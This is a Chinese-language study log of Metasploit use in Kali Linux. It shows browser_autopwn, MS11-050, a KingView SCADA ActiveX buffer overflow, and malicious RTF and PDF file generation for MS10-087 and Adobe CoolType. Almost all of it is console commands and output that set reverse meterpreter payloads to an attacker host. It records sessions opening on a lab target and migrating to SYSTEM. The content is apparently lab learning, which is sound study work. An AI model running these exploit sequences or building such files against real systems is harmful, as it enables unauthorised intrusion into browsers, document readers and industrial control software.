本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程
- MSF 中自动化浏览器攻击
- MS11-050 安全漏洞
- KingView 渗透攻击过程
4.MS10-087 安全漏洞- Adoba阅读器渗透攻击案例
###1.MSF 中自动化浏览器攻击 ###
msf auxiliary(browser_autopwn2) > search browser_autopwn
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
auxiliary/server/browser_autopwn normal HTTP Client Automatic Exploiter
auxiliary/server/browser_autopwn2 2015-07-05 normal HTTP Client Automatic Exploiter 2 (Browser Autopwn)
msf auxiliary(browser_autopwn2) > use auxiliary/server/browser_autopwn
msf auxiliary(browser_autopwn) > show options
Module options (auxiliary/server/browser_autopwn):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST yes The IP address to use for reverse-connect payloads
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Auxiliary action:
Name Description
---- -----------
WebServer Start a bunch of modules and direct clients to appropriate exploits
msf auxiliary(browser_autopwn) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf auxiliary(browser_autopwn) > set URIPATH auto
URIPATH => auto
msf auxiliary(browser_autopwn) > run
[*] Auxiliary module execution completed
[*] Setup
[*] Starting exploit modules on host 10.10.10.128...
[*] ---
[*] Starting exploit android/browser/webview_addjavascriptinterface with payload android/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/KEQN
[*] Server started.
[*] Starting exploit multi/browser/firefox_proto_crmfrequest with payload generic/shell_reverse_tcp [*] Using URL: http://10.10.10.128:8080/DojeEicHhli
[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080\auto 之后
# 返回查看 msf 信息
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Sending HTML...
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Request: /vZlLWxCXzIS/gbBUII/wXWj.swf
[*] 10.10.10.254 adobe_flash_hacking_team_uaf - Sending SWF...
[*] 10.10.10.254 wellintech_kingscada_kxclientdownload - Requested: /SzjZbOOOH/OMcEvw/
[*] 10.10.10.254 wellintech_kingscada_kxclientdownload - Sending KingScada kxClientDownload.ocx ActiveX Remote Code Execution
[*] Starting exploit windows/browser/adobe_flash_mp4_cprt with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/hjZLLYcGnJhR
[*] Server started.
[*] 10.10.10.254 ms14_064_ole_code_execution - Sending exploit...
[*] 10.10.10.254 ms14_064_ole_code_execution - Sending VBS stager
[*] Meterpreter session 1 opened (10.10.10.128:4444 -> 10.10.10.254:1062) at 2017-09-20 02:02:34 -0400
[*] Starting exploit windows/browser/adobe_flash_rtmp with payload windows/meterpreter/reverse_tcp
[*] Using URL: http://10.10.10.128:8080/VAMgZvloTyhw
[*] --- Done, found 20 exploit modules
[*] Using URL: http://10.10.10.128:8080/auto
[-] Auxiliary failed: Rex::RuntimeError The supplied resource '/auto' is already added.
[-] Call stack:
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:411:in `add_resource'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/http/server.rb:188:in `start_service'
[-] /usr/share/metasploit-framework/lib/msf/core/exploit/tcp_server.rb:49:in `exploit'
[-] /usr/share/metasploit-framework/modules/auxiliary/server/browser_autopwn.rb:171:in `run'
[*] Cleaning up exploits...
[*] Server stopped.
###2. MS11-050 安全漏洞 ###
msf > search ms11_050
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/ms11_050_mshtml_cobjectelement 2011-06-16 normal MS11-050 IE mshtml!CObjectElement Use After Free
msf > use exploit/windows/browser/ms11_050_mshtml_cobjectelement
msf exploit(ms11_050_mshtml_cobjectelement) > info
Name: MS11-050 IE mshtml!CObjectElement Use After Free
Module: exploit/windows/browser/ms11_050_mshtml_cobjectelement
Platform: Windows
Privileged: No
License: Metasploit Framework License (BSD)
Rank: Normal
Disclosed: 2011-06-16
Provided by:
d0c_s4vage
sinn3r
bannedit
Available targets:
Id Name
-- ----
0 Automatic
1 Internet Explorer 7 on XP SP3
2 Internet Explorer 7 on Windows Vista
3 Internet Explorer 8 on XP SP3
4 Internet Explorer 8 on Windows 7
5 Debug Target (Crash)
Basic options:
Name Current Setting Required Description
---- --------------- -------- -----------
OBFUSCATE false no Enable JavaScript obfuscation
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH no The URI to use for this exploit (default is random)
Payload information:
Space: 500
Avoid: 6 characters
Description:
This module exploits a use-after-free vulnerability in Internet
Explorer. The vulnerability occurs when an invalid
###3.KingView 渗透攻击过程 ###
http://www.cnblogs.com/justforfun12/p/5324408.html
链接:http://pan.baidu.com/s/1geScJa7 密码:r9a5
放在 /usr/share/metasploit-framework/modules/exploits/windows/browser 这个目录
msf > search kingview
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/kingview_SCADA_activeX_validateuser 2011-03-07 normal KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow
exploit/windows/fileformat/kingview_kingmess_kvl 2012-11-20 normal KingView Log File Parsing Buffer Overflow
exploit/windows/scada/KingView6.53overflow good Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
exploit/windows/scada/KingView6.53overflow good Kingview 6.53 SCADA HMI HistorySvr Heap Overflow
msf > use exploit/windows/browser/kingview_SCADA_activeX_validateuser
msf exploit(kingview_SCADA_activeX_validateuser) > show options
Module options (exploit/windows/browser/kingview_SCADA_activeX_validateuser):
Name Current Setting Required Description
---- --------------- -------- -----------
SRVHOST 0.0.0.0 yes The local host to listen on. This must be an address on the local machine or 0.0.0.0
SRVPORT 8080 yes The local port to listen on.
SSL false no Negotiate SSL for incoming connections
SSLCert no Path to a custom SSL certificate (default is randomly generated)
URIPATH / yes The URI to use.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(kingview_SCADA_activeX_validateuser) > set URIP
set URIPATH set URIPORT
msf exploit(kingview_SCADA_activeX_validateuser) > set URIPATH kingview
URIPATH => kingview
msf exploit(kingview_SCADA_activeX_validateuser) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(kingview_SCADA_activeX_validateuser) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set SRVHOST 10.10.10.128
SRVHOST => 10.10.10.128
msf exploit(kingview_SCADA_activeX_validateuser) > set LPORT 8443
LPORT => 8443
msf exploit(kingview_SCADA_activeX_validateuser) > exploit
[*] Exploit running as background job.
[*] Started HTTP reverse handler on http://10.10.10.128:8443
[*] Using URL: http://10.10.10.128:8080/kingview
[*] Server started.
# 靶机浏览器访问 http://10.10.10.128:8080/kingview 之后
# 返回查看 msf 信息
[-] 10.10.10.254 kingview_SCADA_activeX_validateuser - Exception handling request: No encoders encoded the buffer successfully.
[*] 10.10.10.254 kingview_SCADA_activeX_validateuser - Sending KingView 6.5.3 KVWebSvr.dll ActiveX ValidateUser Buffer Overflow to 10.10.10.254:1045...
###4.MS10-087 安全漏洞 ###
# 先生成渗透文件
msf > search ms10_087
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/fileformat/ms10_087_rtf_pfragments_bof 2010-11-09 great MS10-087 Microsoft Word RTF pFragments Stack Buffer Overflow (File Format)
msf > use exploit/windows/fileformat/ms10_087_rtf_pfragments_bof
msf exploit(ms10_087_rtf_pfragments_bof) > show options
Module options (exploit/windows/fileformat/ms10_087_rtf_pfragments_bof):
Name Current Setting Required Description
---- --------------- -------- -----------
FILENAME msf.rtf yes The file name.
Exploit target:
Id Name
-- ----
0 Automatic
msf exploit(ms10_087_rtf_pfragments_bof) > set payload windows/exec
payload => windows/exec
msf exploit(ms10_087_rtf_pfragments_bof) > set CMD calc.exe
CMD => calc.exe
msf exploit(ms10_087_rtf_pfragments_bof) > set FILENAME ms10087.rtf
FILENAME => ms10087.rtf
msf exploit(ms10_087_rtf_pfragments_bof) > exploit
[*] Creating 'ms10087.rtf' file ...
[+] ms10087.rtf stored at /root/.msf4/local/ms10087.rtf
# 将渗透文件 /root/.msf4/local/ms10087.rtf 拷贝到靶机中并打开
# 弹出一个计算器,攻击成功
###5. Adoba阅读器渗透攻击案例 ###
# 配置测试模块生成文件
msf > search adobe_cool
Matching Modules
================
Name Disclosure Date Rank Description
---- --------------- ---- -----------
exploit/windows/browser/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
exploit/windows/fileformat/adobe_cooltype_sing 2010-09-07 great Adobe CoolType SING Table "uniqueName" Stack Buffer Overflow
msf > use exploit/windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(adobe_cooltype_sing) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(adobe_cooltype_sing) > set LPORT 8443
LPORT => 8443
msf exploit(adobe_cooltype_sing) > set FILENAME 2.pdf
FILENAME => 2.pdf
msf exploit(adobe_cooltype_sing) > run
[*] Creating '2.pdf' file...
[+] 2.pdf stored at /root/.msf4/local/2.pdf
# 将文件复制到靶机
# 启动监听端
msf exploit(adobe_cooltype_sing) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_http
payload => windows/meterpreter/reverse_http
msf exploit(handler) > set LHOST 10.10.10.128
LHOST => 10.10.10.128
msf exploit(handler) > show options
Module options (exploit/multi/handler):
Name Current Setting Required Description
---- --------------- -------- -----------
Payload options (windows/meterpreter/reverse_http):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 10.10.10.128 yes The local listener hostname
LPORT 8080 yes The local listener port
LURI no The HTTP Path
Exploit target:
Id Name
-- ----
0 Wildcard Target
msf exploit(handler) > exploit
[*] Started HTTP reverse handler on http://10.10.10.128:8080
# 靶机打开文件后 msf 显示
[*] http://10.10.10.128:8443 handling request from 10.10.10.254; (UUID: duvbthou) Staging x86 payload (958035 bytes) ...
[*] Meterpreter session 1 opened (10.10.10.128:8443 -> 10.10.10.254:1048) at 2017-09-20 11:08:55 -0400
[*] Session ID 1 (10.10.10.128:8443 -> 10.10.10.254:1048) processing InitialAutoRunScript 'post/windows/manage/priv_migrate'
[*] Current session process is acrord32.exe (2136) as: DH-CA8822AB9589\Administrator
[*] Session is Admin but not System.
[*] Will attempt to migrate to specified System level process.
[*] Trying services.exe (716)
[+] Successfully migrated to services.exe (716) as: NT AUTHORITY\SYSTEM